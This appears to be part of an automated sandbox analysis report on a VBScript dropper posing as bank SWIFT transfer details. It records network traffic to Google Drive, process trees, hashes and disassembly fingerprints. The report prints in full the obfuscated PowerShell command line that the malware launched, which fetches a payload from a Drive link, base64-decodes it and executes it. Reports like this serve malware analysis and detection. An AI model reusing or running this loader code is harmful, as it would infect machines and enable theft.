                                  Apr 23, 2024 08:06:28.253473043 CEST6415253192.168.2.61.1.1.1
                                  Apr 23, 2024 08:06:28.342027903 CEST53641521.1.1.1192.168.2.6

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Apr 23, 2024 08:06:27.744230032 CEST192.168.2.61.1.1.10xd856Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                  Apr 23, 2024 08:06:28.253473043 CEST192.168.2.61.1.1.10xc970Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Apr 23, 2024 08:06:27.832860947 CEST1.1.1.1192.168.2.60xd856No error (0)drive.google.com142.250.65.174A (IP address)IN (0x0001)false
                                  Apr 23, 2024 08:06:28.342027903 CEST1.1.1.1192.168.2.60xc970No error (0)drive.usercontent.google.com142.250.65.225A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • drive.google.com
                                  • drive.usercontent.google.com

                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.649699142.250.65.1744431132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-23 06:06:28 UTC215OUTGET /uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-04-23 06:06:28 UTC1582INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Tue, 23 Apr 2024 06:06:28 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Security-Policy: script-src 'nonce-GDomhJoe6WnP2u6wTUNqKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.649700142.250.65.2254431132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-23 06:06:28 UTC233OUTGET /download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.usercontent.google.com
                                  Connection: Keep-Alive
                                  2024-04-23 06:06:29 UTC2120INHTTP/1.1 200 OK
                                  X-GUploader-UploadID: ABPtcPoQRh5ZYIHTLVn8j2xptMGZwqBCKEXygcZ787sVHTuyHmRd-uZE6qSke7llx-SL1n3YZuA
                                  Content-Type: text/html; charset=utf-8
                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Tue, 23 Apr 2024 06:06:29 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Security-Policy: script-src 'nonce-S5Au2cwHPvQV4-Gha0ZHBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw1JBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIib4-n8uRvZBDb83CUKAPK2FOQ"
                                  Content-Length: 1692
                                  Server: UploadServer
                                  Set-Cookie: NID=513=TQCvhUHaHH9t9FGBrSeqW4KfiovelqPob-ILeSM0R_NCyG7RDYRFjBebK4ma6o70WMGJsmFWg4t0O2KAafaKkAGH2sPOimSFZ5keq2gOpgWYhpP_2oFpb3vZ1b7Qr_8PiNm5wv0Q2P19zGV-Dt4vhUUHCmt-3Il1qJ2HikODVEM; expires=Wed, 23-Oct-2024 06:06:28 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                  2024-04-23 06:06:29 UTC1692INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 4a 71 39 42 74 51 65 70 77 4a 66 36 72 50 6d 59 4a 4d 71 6e 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                  Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="NJq9BtQepwJf6rPmYJMqnw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:08:06:24
                                  Start date:23/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs"
                                  Imagebase:0x7ff6ea3a0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:08:06:24
                                  Start date:23/04/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blotg UsdeeIndverForstvAmanurNubi.k EutrsGigabt UnsceStilndDeliqe PrectPicad.WholesSalpiphen,elOra,giOv rstDanma( B.fa$NovicI uashnSammedStab.dbrydneCirculTelepiWinnonMe,degUnabre B.acn DefusProgr) D,al ');$Sadelmagervrkstedet=$Vermilingues[0];toptekster (Hungerless 'Ti ss$VandigFemkal Coy.oF.stebH.alia Win lGenne:Spe.iFGrap.uStav nOp,hakNonent SaliiSkraaoHystenOve fs Se faNonsofBlondpmyelirUucpnvTawn.nVestri AnagnBepl gPendre H,inngustesarvea=OutstNKorr.eReinswSprin-.artyOHilstb Tripj,vereespildc,enzotTjats DinerSPr.jnySpisesKlerktPartheCangim.enin.tamm N.aimae Spist Supe.TumblW ForteMes,ibAf.adCSte mlFireaiFolkeeE,pulnUafhatMelle ');toptekster (Hungerless 'Atomd$ StivFRverhu .esynUd,ikkbilletun.aci unjoAn,manBoa.lsDkadra,eaktf,atiop heffr MalevEntomnHookaiSierrnA utegRe ise ambrnTyggesAr.er.BenovH H rteV,teraHydr,d Mekae.educrudko.s Tan,[Vand,$ArionOStrejpTils.v Pre uNonderRemitd PhileLysaarDespeiF,dtun Par.gExtersfron ]gra,e=.eren$YahunACorreh PreeiMin.tsKonkrtKnfrioAnskurChorei upec aryt ');$Sandfangene=Hungerless ' dkmpFBusl,uHesten,ndosk F dntPurgaiBouleo GlownkommesWishlaStratfSvi,epAchror,reenv Allon ChiniAgonin s opgCompueOmvltn BiotsRegre.Dyst D IndioUnselwOuvernh tudlBat,uo FiniaCoonidForevF ParaiDeaktlkvg neSprag(Outmo$TidsfS PreaaDansed ,rtseIrremlOrkanm Friea orsogFlooreArbejr Emesv AnderElektkSpildsTrykktRaas.e ,kildAnateeDeca t Fred, rklr$R.bbeKAstrolVestsa SsonmDoetmmVa.ske,uxocralko.nN.okee DegesGeuma)Ferio ';$Sandfangene=$Raadslaaet[1]+$Sandfangene;$Klammernes=$Raadslaaet[0];toptekster (Hungerless 'Ophth$ G,legOxblolsubvioNymphbW lfwasus,nlInval:un.asNStal,oSphenn PlancBoussa AfkarAudiotLambke DeadlJaguaiDekomzUreteeTone.dDingesRifer=Kredi(revolTPigene rkaisMletktSporv-RecipP BrasaStanzt pekth Tend Sk dt$Di.krKOradblAn.peaT.stsmTordimUncree arsirDdspanBrevde BandsBirnm)Philo ');while (!$Noncartelizeds) {toptekster (Hungerless 'Ameto$Kol,egRkkehlOprejoperinblkassa,ienolAande:PurpeTHexahi hvill D.oxb Wordakr.tkgchatte indfReprsrAmiabs,loakeretn lBaku s Me s=Blads$P.nthtOffenrVideruWooleeProgr ') ;toptekster $Sandfangene;toptekster (Hungerless 'AntiqSse,rtt .anda,umerrUdsugtMirac-Mi,caSsa,nslWencke.elleeMutu pPin,a Fors.4Fresi ');toptekster (Hungerless 'Comid$Histog Sugel Torpo,gelibRad oa Fronl Uncl:Laur.NArkfdo Vurdn ,oencCopriaDeossrJoypotBrnepeIlseblIntr.iHieroz lageRun edBeanesStyri=,iske(Vaag,TButcheVerd.sHymnetFront-reklaP,ksema,ogittUns ohKont, Bilbo$indskKSkalalInfarasl,tamfly,em.aarnedistir Surcndi.cue Fatts Resp)reple ') ;toptekster (Hungerless 'R,gis$Engagg .inylErhveoSom.sbG,adya skollThr.a:.lappOAmy,op ,orlsLingui Upwag AffreDk man ValedPartiemiliessubvo=Distr$SkuedgWo.drlAvi,noPyranbVict.aToboglEska.:CrossSStrukpArbeji ChocrRestaaRo,anlYder.fFidusjSulfoeRecrudRe ideForfrrPreste ForsnEvneds s,nd+Figur+Un,ut%A,rod$ VedeV Siphe Icter G,mnmGeri,iPr,shlOutcuiDelren SootgSchwauchorieEfters B at.Frstecsup rofantauStensn M.lltOve.m ') ;$Sadelmagervrkstedet=$Vermilingues[$Opsigendes];}toptekster (Hungerless 'Konde$T,rbigOakuml ReimoAutombSesquaTo,etl rei :T upeIMyst,nBonittup,pleDragsr GlykmKundseCass zM rgizTrysto HaptsProsc ,ass=Sodde StokrGHondpeLentitTil t-InterCInd.eo Primn olastHonn eNonbunRerattTreho Kvet$Ca spKBespnlDistraBontemHolopmUncone LuftrLouizn OprueTak esRee,l ');toptekster (Hungerless 'Brike$Billeg Kni l ,onsomariobProfuaGastal Fast:Mug,ehIsdesywanwep silueSjl arProtolJe oroBirdlgNucleiPiestcStictaAffall Kaffi,rogrtKlu.cyUd.ta Agte=Tilhu Showi[ prodSA.ekkyvarefs S.aatVi dee H,enm unpo.ForsiCP.ylloSpermnUkuravSu.maePericrSidegtMisd.]Zinkk: ulbj:DiallFSpndhr Vin,osmaasm ,ithB nteaExc,usSterieSpege6R ind4BetroS SurgtFormar No ei,kurknRaadigCello(D.mor$Koty.IbygninEva.utAgaveeinstirDiatomBut.eeBanenzElvrkzomstno SkinsSpalt)vejle ');toptekster (Hungerless ' Neap$PipikgGallelSeparo,riesbMet,daBnnesl Vome:BurguG SchmrGeokeaLnud,a Overlh kseiUtilbgBuffe lokk=skrek Marin[,nvirSunidey nvessTricrt Forpe windm Stik. Ulv TSide,eSubofxChac.tKorpu.Afma.ESeparn ynancM.rahoGrunddReen.i U,denAalbogUopsl]Fusta:Ru,my:DelikAKaldeSFunktCTankeIMacroILards.NonflGHang,e FaldtHalvdSam notHypnor IndeiTredknOpdrigMtaa,(Humou$presbh ,oenyBaad.pScrubeRisotrKilldlBlan.o Ger.gOversiGenercTr.vra FrdilArchaiFishmt.ryseyU amb)Perth ');toptekster (Hungerless 'Uncoh$M.lligSprn.l Sa moKo.mabKvaliaFor.klPa.ne:OmvenD skovi TidevIntereMiljrrGerfasTuli.iBenchf bbediLan se Kn,cdSorte=Subti$PantoGInsurrGinglaLilleaAccesl Almei S bsgmorga. BewesUlsteu Mu.tbZickasHa.vdtForm rMonopi Ca.dnScr wg Dags( F,jl2Indfa8 emil5 Grun0Ankr 8Sen.i7Ble d,devov3,nder0Turna1 mano4 rsta6Fortr).tort ');toptekster $Diversified;"
                                  Imagebase:0x7ff6e3d50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:08:06:24
                                  Start date:23/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff66e660000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:08:06:26
                                  Start date:23/04/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $"
                                  Imagebase:0x7ff6a8c40000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Executed Functions

                                    Function 00007FFD34964D24 Relevance: .1, Instructions: 131COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2243040951.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fa4a8fedda6d5524588f4666a6e473d3c0eab3807a803f7eb53b1ce40abc0d31
                                    • Instruction ID: efd1c40d786129f443f04ada7c027467f4c7d8ba41cf109fb8d5609bd0dc8675
                                    • Opcode Fuzzy Hash: fa4a8fedda6d5524588f4666a6e473d3c0eab3807a803f7eb53b1ce40abc0d31
                                    • Instruction Fuzzy Hash: 08410622F0CA499FEB95EA9C94B16B8B7D1EF5A360F1800BEC14DC7187D92DB801C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD34964D4A Relevance: .1, Instructions: 61COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2243040951.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ee2d74450f97be19eb2fa1df39ec544da978270806ca3166fc78c9f6679cba27
                                    • Instruction ID: e69a55a4e8614d362ea8a06d440817bba8189896def5e1f75fc78291cd3025c4
                                    • Opcode Fuzzy Hash: ee2d74450f97be19eb2fa1df39ec544da978270806ca3166fc78c9f6679cba27
                                    • Instruction Fuzzy Hash: DB11E322F0DA459FEBA5EA9850B427877D1EF5A334B0400BEC14DC7187D92DA8018315
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD34893945 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2242717271.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                    • Instruction ID: 241876a0f25de1cf04efdc636e1e615018bbc16f719980464517d69e48099cc2
                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                    • Instruction Fuzzy Hash: 8A01677121CB0D4FD744EF4CE451AA5B7E0FB99364F10056DE58AC3651D636E881CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 00007FFD348985FA Relevance: 6.8, Strings: 5, Instructions: 539COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2242717271.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: N_^$N_^$N_^$N_^$N_^
                                    • API String ID: 0-2528851458
                                    • Opcode ID: 2ce1fa143fca7212c373bd0507f1506b3469e24c05d2a51b0854fdfd3f37f853
                                    • Instruction ID: ec3dfa5c290f02f717f7c410f78b9e35c453abe4219d7ed9978b88d712c26481
                                    • Opcode Fuzzy Hash: 2ce1fa143fca7212c373bd0507f1506b3469e24c05d2a51b0854fdfd3f37f853
                                    • Instruction Fuzzy Hash: 82919253B1EFC25FE75357680CB90A96FA0EF6325470908F6C69ACB093E91D28079792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD34898352 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2242717271.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: N_^
                                    • API String ID: 0-884294832
                                    • Opcode ID: 0bf03c7ac3dd247de43e241a9d27dd227d2d71c122416b6f6018854cdb8651a6
                                    • Instruction ID: 0babbd2f470167b6cefd4414a825361eac67c445fa4a83e5a0b01e2cfb203364
                                    • Opcode Fuzzy Hash: 0bf03c7ac3dd247de43e241a9d27dd227d2d71c122416b6f6018854cdb8651a6
                                    • Instruction Fuzzy Hash: 0F518357B1DBD35BF322432C4CBA0EA6FD0EF5326570914B7C7D5CA493EA0D6806A291
                                    Uniqueness

                                    Uniqueness Score: -1.00%